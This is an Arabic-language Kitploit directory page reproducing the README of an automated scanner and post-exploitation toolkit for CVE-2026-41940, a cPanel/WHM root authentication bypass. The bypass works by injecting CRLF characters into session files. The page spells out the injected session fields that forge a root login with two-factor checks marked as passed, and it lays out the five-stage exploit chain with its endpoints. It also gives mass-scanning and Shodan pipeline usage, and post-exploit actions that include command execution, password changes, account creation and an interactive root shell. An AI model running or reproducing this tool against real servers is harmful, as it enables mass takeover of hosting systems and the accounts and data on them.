Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Automated-scanner-CVE-2026-41940 — ماسح ضوئي آلي وأداة ما بعد الاستغلال لـ CVE-2026-41940 — تجاوز مصادقة root في cPanel و WHM عبر حقن CRLF في ملف الجلسة | Kitploit
أدوات/GitHubGitHub/sardine-web/automated-scanner-cve-2026-41940
المصادقة والترخيصالاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الفريق الأحمر
تطوير الحمولات
GitHubsardine-web/automated-scanner-cve-2026-41940

Automated-scanner-CVE-2026-41940

ماسح ضوئي آلي وأداة ما بعد الاستغلال لـ CVE-2026-41940 — تجاوز مصادقة root في cPanel و WHM عبر حقن CRLF في ملف الجلسة

عرض المستودع
117منذ 4 أشهرلم تتم المراجعة بعد

استغلال ثغرة CVE في cPanel

English | فارسی (Persian)

 ██████╗██████╗  █████╗ ███╗   ██╗███████╗██╗
██╔════╝██╔══██╗██╔══██╗████╗  ██║██╔════╝██║
██║     ██████╔╝███████║██╔██╗ ██║█████╗  ██║
██║     ██╔═══╝ ██╔══██║██║╚██╗██║██╔══╝  ██║
╚██████╗██║     ██║  ██║██║ ╚████║███████╗███████╗
 ╚═════╝╚═╝     ╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚══════╝

 ██████╗██╗   ██╗███████╗
██╔════╝██║   ██║██╔════╝
██║     ██║   ██║█████╗
██║     ╚██╗ ██╔╝██╔══╝
╚██████╗ ╚████╔╝ ███████╗
 ╚═════╝  ╚═══╝  ╚══════╝

███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
█████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝

Python CVE CVSS License Stdlib

أداة مسح آلي ومجموعة أدوات ما بعد الاستغلال لثغرة CVE-2026-41940 — تجاوز المصادقة لجذر WHM و cPanel عن طريق حقن CRLF في ملف الجلسة.


جدول المحتويات

  • نظرة عامة
  • تفاصيل CVE
  • كيفية العمل
  • الميزات
  • الإصدارات المتأثرة
  • المتطلبات
  • التثبيت
  • البدء السريع
  • الاستخدام
  • إجراءات ما بعد الاستغلال
  • قشرة WHM التفاعلية
  • المسح الجماعي والتكامل مع خطوط الأنابيب
  • استعلامات Shodan
  • تنسيق الإخراج
  • جلسة مثال
  • إخلاء مسؤولية قانوني

نظرة عامة

CPANEL CVE EXPLOIT هي أداة بلغة Python في ملف واحد مصممة لـ تقييمات أمنية مصرح بها لخوادم cPanel و WHM المعرضة لثغرة CVE-2026-41940.

تسمح الثغرة لمهاجم عن بعد غير مصادق بتسميم ملفات جلسة WHM عن طريق حقن CRLF في رأس Authorization: Basic، مما يتجاوز المصادقة ويمنح وصولاً لجذر WHM بدون بيانات اعتماد صالحة.

الخاصيةالقيمة
CVECVE-2026-41940
الخطورةحرجة
CVSS10.0
ناقل الهجومشبكة / غير مصادق
التأثيروصول كامل لجذر WHM
المنفذ الافتراضي2087 (WHM)
الحالةتم تأكيد الاستغلال في البرية (أبريل 2026)

تفاصيل CVE

السبب الجذري

في الإصدارات المعرضة من cPanel و WHM، تستدعي saveSession() في Session.pm دالة filter_sessiondata() بعد كتابة ملف الجلسة على القرص. يمكن للمهاجم حقن حروف CRLF (\r\n) عبر رأس HTTP Authorization: Basic، والتي تُكتب مباشرةً في ملف الجلسة على القرص — متجاوزةً التعقيم.

حقول الجلسة المحقونة

تستخدم الأداة حمولة مشفرة بـ Base64 تُفك إلى:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

تحاكي هذه الحقول جلسة WHM موثقة بالكامل لجذر، بما في ذلك تجاوز المصادقة الثنائية (tfa_verified=1) وعلم صلاحية الجذر (hasroot=1).

الإصلاح

قامت cPanel بنقل filter_sessiondata() لتنفيذ قبل عملية كتابة الجلسة في Session.pm.


كيفية العمل

تتكون سلسلة الاستغلال من 5 مراحل (المرحلة 0–4):

flowchart TD
    A[Stage 0: Canonical Host Discovery] --> B[Stage 1: Mint Preauth Session]
    B --> C[Stage 2: CRLF Injection via Authorization Header]
    C --> D[Stage 3: Session Propagation via do_token_denied]
    D --> E[Stage 4: Verify Root Access via json-api/version]
    E --> F{Vulnerable?}
    F -->|Yes| G[Post-Exploit Actions / Interactive Shell]
    F -->|No| H[Skip Target]

    A -.- A1["GET /openid_connect/cpanelid → 307 redirect reveals real hostname"]
    B -.- B1["POST /login/?login_only=1 → whostmgrsession cookie"]
    C -.- C1["GET / + poisoned Basic auth → /cpsessXXXXXXXXXX token"]
    D -.- D1["GET /scripts2/listaccts → flush raw session to cache"]
    E -.- E1["GET /cpsessXXX/json-api/version → HTTP 200 + version JSON"]
المرحلةنقطة النهايةالغرض
0/openid_connect/cpanelidاكتشاف اسم المضيف القياسي تلقائياً عبر إعادة التوجيه 307
1/login/?login_only=1الحصول على كوكي whostmgrsession مسبق المصادقة ببيانات اعتماد خاطئة
2/حقن رأس Authorization: Basic المسموم بـ CRLF في ملف الجلسة
3/scripts2/listacctsتشغيل أداة do_token_denied لتفريغ الجلسة في ذاكرة التخزين المؤقت
4/{token}/json-api/versionتأكيد وصول الجذر — HTTP 200 مع JSON للإصدار

الميزات

الميزةالوصف
مسح هدف واحدسلسلة استغلال كاملة ضد رابط WHM واحد
المسح الجماعيمسح متعدد الخيوط من ملف أو الإدخال القياسي
كشف الإصدارمقارنة إصدارات تم إصلاحها/معرضة تلقائياً
API ما بعد الاستغلالتغيير كلمة المرور، تنفيذ الأوامر، سرد الحسابات، إنشاء مستخدمين
قشرة تفاعليةقشرة WHM جذر مدمجة مع قراءة ملفات وأوامر API
تسجيل الدخول عبر Seleniumحقن كوكي الجلسة تلقائياً في Chrome/Firefox
بديل المتصفح اليدويمقتطفات JavaScript لوحدة التحكم لتسجيل الدخول اليدوي إلى WHM
فحص RCEتحقق سريع id / uname -a بعد التجاوز
تصدير JSONحفظ جميع النتائج في تقرير JSON منظم
جاهز لخطوط الأنابيبيعمل مع httpx و subfinder و shodan و awk
مكتبة قياسية فقطلا تبعيات pip مطلوبة للوظائف الأساسية
إخراج ملونتسجيل المراحل في الوقت الفعلي مع مؤشرات الخطورة

الإصدارات المتأثرة

الفرعالإصدار المُصلحالحالة
11.110.x11.110.0.97معرض أسفل الإصلاح
11.118.x11.118.0.63معرض أسفل الإصلاح
11.126.x11.126.0.54معرض أسفل الإصلاح
11.132.x11.132.0.29معرض أسفل الإصلاح
11.134.x11.134.0.20معرض أسفل الإصلاح
11.136.x11.136.0.5معرض أسفل الإصلاح

ملاحظة: يتم وضع علامة تلقائياً على الأهداف التي تعمل بإصدارات مُصلحة وتجاوزها أثناء المسح.


المتطلبات

الأساسية (إلزامية)

  • Python 3.8+
  • لا حزم خارجية — يستخدم مكتبة Python القياسية فقط

اختيارية

الحزمةالغرض
seleniumتسجيل دخول المتصفح التلقائي (--selenium)
Chrome / Firefoxمحرك المتصفح لـ Selenium
pip install -r requirements.txt   # اختياري — selenium فقط

التثبيت

git clone https://github.com/YOUR_USERNAME/cpanel-cve-exploit.git
cd cpanel-cve-exploit

لا توجد خطوة بناء مطلوبة. يُشغّل مباشرة:

python3 test-cve.py --help

البدء السريع

# مسح هدف WHM واحد
python3 test-cve.py -u https://target.com:2087

# مسح مع ما بعد الاستغلال: سرد جميع حسابات cPanel
python3 test-cve.py -u https://target.com:2087 --action list

# مسح جماعي من ملف، 20 خيط، حفظ تقرير JSON
python3 test-cve.py -l targets.txt -t 20 -o results.json

الاستخدام

usage: test-cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                   [-t THREADS] [--timeout TIMEOUT] [--rate-limit RATE_LIMIT]
                   [--action {list,passwd,cmd,exec,info,version,shell,adduser}]
                   [--passwd PASSWD] [--cmd CMD]
                   [--new-user NEW_USER] [--new-domain NEW_DOMAIN]
                   [--read-file READ_FILE] [--selenium]
                   [--engine {chrome,firefox}] [--browser] [--check-rce]
                   [-o OUTPUT] [--no-color]

خيارات الهدف

تنزيل الأداة